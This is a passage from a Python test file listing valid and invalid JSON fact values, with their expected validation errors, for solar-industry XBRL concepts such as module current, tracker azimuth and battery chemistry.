"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type num:percentItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "-0.01",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type num:percentItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "100.01",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type num:percentItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type num:percentItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:AerosolModelFactorTMMPercent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
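    # --- xbrli:anyURIItemType cases. ---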
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "http://www.google.com",
"aspects": {
"concept": "solar:CutSheetDocumentLink",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "https://www.google.com",
"aspects": {
"concept": "solar:CutSheetDocumentLink",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type xbrli:anyURIItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:CutSheetDocumentLink",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type xbrli:anyURIItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:CutSheetDocumentLink",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type xbrli:anyURIItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99",
"aspects": {
"concept": "solar:CutSheetDocumentLink",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
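    # --- dei:legalEntityIdentifierItemType cases. ---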
[_ln(), "Participant", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "5493006MHB84DD0ZWV18",
"aspects": {
"concept": "dei:LegalEntityIdentifier",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "Participant", "value is not legal for type dei:legalEntityIdentifierItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "dei:LegalEntityIdentifier",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
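    # --- num-us / num unit types: current, frequency, insolation, irradiance, plane angle, pressure, speed, temperature, voltage, area, energy, length, mass, power, volume. ---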
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:ModuleShortCircuitCurrent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type num-us:electricCurrentItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModuleShortCircuitCurrent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:InverterOutputRatedFrequency",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type num-us:frequencyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:InverterOutputRatedFrequency",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:ExpectedInsolationAtP50",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "value is not legal for type num-us:insolationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ExpectedInsolationAtP50",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "MonthlyOperatingReport", "value is out of range for type num-us:insolationItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "101.01",
"aspects": {
"concept": "solar:ExpectedInsolationAtP50",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:SystemMinimumIrradianceThreshold",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type num-us:irradianceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemMinimumIrradianceThreshold",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "SystemDeviceListing", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "33.33",
"aspects": {
"concept": "solar:TrackerAzimuth",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "SystemDeviceListing", "value is out of range for type num-us:planeAngleItemType", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "361.1",
"aspects": {
"concept": "solar:TrackerAzimuth",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "SystemDeviceListing", "value is not legal for type num-us:planeAngleItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:TrackerAzimuth",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:SiteBarometricPressure",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type num-us:pressureItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SiteBarometricPressure",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "19.19",
"aspects": {
"concept": "solar:TrackerStowWindSpeed",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type num-us:speedItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:TrackerStowWindSpeed",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModelAmbientTemperature",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type num-us:temperatureItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModelAmbientTemperature",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:InverterInputMaximumVoltageDC",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type num-us:voltageItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:InverterInputMaximumVoltageDC",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:SiteAcreage",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type num:areaItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SiteAcreage",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:ExpectedEnergyAtP50",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type num:energyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ExpectedEnergyAtP50",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModuleLength",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type num:lengthItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ModuleLength",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:InverterWeight",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type num:massItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:InverterWeight",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:BatteryInverterACPowerRating",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type num:powerItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:BatteryInverterACPowerRating",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "99.99",
"aspects": {
"concept": "solar:WashingAndWasteQuantityOfWater",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "WashingAndWasteAgreement", "value is not legal for type num:volumeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:WashingAndWasteQuantityOfWater",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
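    # --- solar-types enumerations: one legal member per type, then "False" and "Invalid Value" rejections. ---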
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Storage",
"aspects": {
"concept": "solar:SystemDERType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:DERItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemDERType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:DERItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemDERType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Preliminary",
"aspects": {
"concept": "solar:AmericanLandTitleAssociationSurveyStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:aLTASurveyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:AmericanLandTitleAssociationSurveyStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:aLTASurveyItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:AmericanLandTitleAssociationSurveyStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "NiCad",
"aspects": {
"concept": "solar:BatteryStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type solar-types:batteryChemistryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:BatteryStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "IECRECertificate", "value is not legal for type solar-types:batteryChemistryItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:BatteryStyle",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "DC-Coupled",
"aspects": {
"concept": "solar:SystemBatteryConnection",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:batteryConnectionItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SystemBatteryConnection",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:batteryConnectionItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SystemBatteryConnection",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "2.4.1 Hot summer continental climates",
"aspects": {
"concept": "solar:SiteClimateClassificationKoppen",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:climateClassificationKoppenItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SiteClimateClassificationKoppen",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:climateClassificationKoppenItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SiteClimateClassificationKoppen",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Mixed - Marine",
"aspects": {
"concept": "solar:SiteClimateZoneTypeANSI",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:climateZoneANSIItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SiteClimateZoneTypeANSI",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:climateZoneANSIItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SiteClimateZoneTypeANSI",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Modbus",
"aspects": {
"concept": "solar:DataAcquisitionSystemCommunicationProtocol",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:communicationProtocolItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:DataAcquisitionSystemCommunicationProtocol",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:communicationProtocolItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:DataAcquisitionSystemCommunicationProtocol",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "BatteryManagementSystemMember",
"aspects": {
"concept": "solar:TypeOfDevice",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:deviceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:TypeOfDevice",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "CutSheet", "value is not legal for type solar-types:deviceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:TypeOfDevice",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Distributed Generation",
"aspects": {
"concept": "solar:ProjectDistributedGenerationPortolioOrUtilityScale",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:distributedGenOrUtilityScaleItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectDistributedGenerationPortolioOrUtilityScale",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:distributedGenOrUtilityScaleItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectDistributedGenerationPortolioOrUtilityScale",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Final Approval",
"aspects": {
"concept": "solar:DivisionOfStateArchitectApprovalStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:divisionStateApprovalStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:DivisionOfStateArchitectApprovalStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:divisionStateApprovalStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:DivisionOfStateArchitectApprovalStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Moderate",
"aspects": {
"concept": "solar:ProjectRecentEventSeverityOfEvent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:eventSeverityItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectRecentEventSeverityOfEvent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:eventSeverityItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectRecentEventSeverityOfEvent",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ZoningPermitUpfrontFeeStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:feeStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ZoningPermitUpfrontFeeStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:feeStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invald Value",
"aspects": {
"concept": "solar:ZoningPermitUpfrontFeeStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:FundStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:fundStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:FundStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:fundStatusItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:FundStatus",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "GEOJson",
"aspects": {
"concept": "solar:SiteGeospatialBoundaryGISFileFormat",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:gISFileFormatItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:SiteGeospatialBoundaryGISFileFormat",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:gISFileFormatItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:SiteGeospatialBoundaryGISFileFormat",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:hedgeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Revenue Put",
"aspects": {
"concept": "solar:ProjectHedgeAgreementType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:hedgeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:ProjectHedgeAgreementType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "", "value is not legal for type solar-types:hedgeItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:ProjectHedgeAgreementType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Surety Solar Module Supply Bond",
"aspects": {
"concept": "solar:InsuranceType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:insuranceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:InsuranceType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:insuranceItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:InsuranceType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "None", 0, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:NetworkType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:internetConnectionItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "False",
"aspects": {
"concept": "solar:NetworkType",
"entity": "JUPITER",
"period": "2017-11-01T00:00:00/2017-11-30T00:00:00"
}
}
}
"""
],
[_ln(), "None", "value is not legal for type solar-types:internetConnectionItemType", 2, """
{
"d5ead87b-58c6-4aab-9795-e7e92ca0bcf2": {
"value": "Invalid Value",
"aspects": {
"concept": "solar:NetworkType",
